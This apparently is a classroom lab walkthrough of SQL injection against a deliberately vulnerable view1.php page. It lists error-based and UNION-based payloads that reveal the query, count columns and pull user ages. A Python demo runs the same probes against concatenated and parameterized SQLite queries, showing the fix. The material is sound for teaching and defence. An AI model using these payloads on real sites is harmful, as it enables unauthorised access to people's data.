list.php
- Try it.
- View source
- It calls view1.php?id=1 or id=2, so we know the ids and that
the table is called users.
- We know that Mickey Mouse's id is 1.
view1.php
- Try view1.php?id=3
- Try view1.php?id=3'
- You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to
use near '' LIMIT 1' at line 1 in SELECT * FROM users WHERE id=3'
LIMIT 1
- So we now know the table name and the form of the SQL.
- The LIMIT 1 is going to be a problem if we want to see everything.
- Try view1.php?id=1 AND XXX IS NULL
- Unknown column 'XXX' in 'where clause' in SELECT * FROM users WHERE id=1 and barf IS NULL LIMIT 1
- Try view1.php?id=1 AND age IS NULL
- There's a name, probably first and last. Try some other things.
- Maybe we find first_name and last_name, maybe not.
- Can we determine the number of columns? Try id=1 union all select 1
- We get an error, so there's more than one column; by trial and error, we
find there are 4 columns.
- Try: id=1 union all select 1,2,3,4 from users;
- First name is column 2, last name is column 3, id and age are 1 and 4.
- Try: id=1 union all select age,age,age,age from users;
- We get Mickey Mouse as before (the LIMIT 1 shows only the id=1 row).
- Try: id=99 union all select age,age,age,age from users;
- We get 81,81 (both displayed columns are now age). Since no row has
id=99, the first row shown comes from the union; that's probably the age
of the first user.
- Try: id=99 union all select age,age,age,age from users where id=1; --
- Try: id=99 union all select age,age,age,age from users where id=2; --
- Get the age of the user with id=2
- Or try with first_name
- Mickey is 81
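The steps above work because view1.php splices the id parameter straight into the query and returns raw database errors. The following is an added example, not code from the original notes or the lab site: it rebuilds the four-column users table the notes infer (id, first_name, last_name, age) in an in-memory SQLite database, runs the notes' own probes against a concatenated query that mirrors view1.php, and then against a parameterized version that only accepts an integer id. Mickey Mouse (id 1, age 81) comes from the notes; the second row is constructed, and the function names are assumptions.

```python
import sqlite3

# Constructed sample data. Mickey Mouse id=1, age 81 is from the notes; the second row is made up.
USERS = [
    (1, "Mickey", "Mouse", 81),
    (2, "Donald", "Duck", 90),
]


def make_db():
    """Build an in-memory copy of the 4-column users table the notes infer."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER, first_name TEXT, last_name TEXT, age INTEGER)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return conn


def view_vulnerable(conn, id_param):
    """Mirror of the view1.php query shape: the id is concatenated into the SQL,
    and any database error is echoed back, leaking the query and column names."""
    sql = f"SELECT * FROM users WHERE id={id_param} LIMIT 1"
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.OperationalError as err:
        return f"error: {err}"


def view_fixed(conn, id_param):
    """Hardened version: the id must be a plain integer and is bound as a parameter,
    so it can never change the structure of the query. Bad input gets a generic
    'not found' (None) rather than a database error message."""
    try:
        id_value = int(id_param)
    except (TypeError, ValueError):
        return None
    return conn.execute(
        "SELECT * FROM users WHERE id=? LIMIT 1", (id_value,)
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    probes = [
        "1",                                               # normal request
        "3'",                                              # syntax-error probe from the notes
        "1 AND XXX IS NULL",                               # column-name probe from the notes
        "99 union all select age,age,age,age from users",  # union probe from the notes
    ]
    for p in probes:
        print(f"{p!r:55} vulnerable -> {view_vulnerable(db, p)}")
        print(f"{'':55} fixed      -> {view_fixed(db, p)}")
```

With the concatenated query the union probe returns a row of ages in place of the user record and the column probe returns the database's "no such column" text, which is exactly the information the notes use; with the bound parameter every probe that is not an integer id is rejected before it reaches the database, and the legitimate id=1 request still returns Mickey Mouse.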
Now try the other views